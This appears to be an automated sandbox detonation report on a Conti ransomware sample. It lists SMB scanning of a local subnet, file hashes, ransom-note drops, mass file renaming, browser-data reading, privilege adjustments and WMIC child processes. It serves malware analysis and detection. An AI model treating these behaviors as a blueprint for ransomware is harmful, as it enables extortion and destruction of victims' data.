US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.37:139 tcp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.38:139 tcp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.39:139 tcp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.40:139 tcp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.41:139 tcp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.42:139 tcp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.43:139 tcp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.44:139 tcp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.45:139 tcp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.46:139 tcp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.47:139 tcp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.48:139 tcp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:139 tcp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.50:139 tcp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.51:139 tcp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.52:139 tcp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.55:139 tcp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.61:139 tcp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.62:139 tcp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.63:139 tcp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp

Files

C:\Users\Admin\Desktop\032422-readme.html

MD5 57fa8637b235e5993918ef1bea17705e
SHA1 7afae622daff5fd49e890478a0f2c78c61f35576
SHA256 dea9c5e92641b2ee485d347aef2127c2fcefb9a86e46708cdc71f601fa6b32db
SHA512 98d659189d050257228ded2471cf1bf62c396f1a5d7f273ac64632eec2e019c4ac8a212cd1fc77e1b8de93b085c18670ea06b199ba36a98f3b5bcfdbab926bb9

Analysis: behavioral13

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1563s

Max time network

1572s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Renames multiple (7995) files with added filename extension

ransomware

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G2KVEH0D\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7JXML4U5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CNQY6MQU\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72EHROQQ\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\handsafe.reg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\tt\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FRENCH.LNG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.ICO C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosefont.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Premium.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\StatusOnline.ico C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1556 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1592 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2632 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
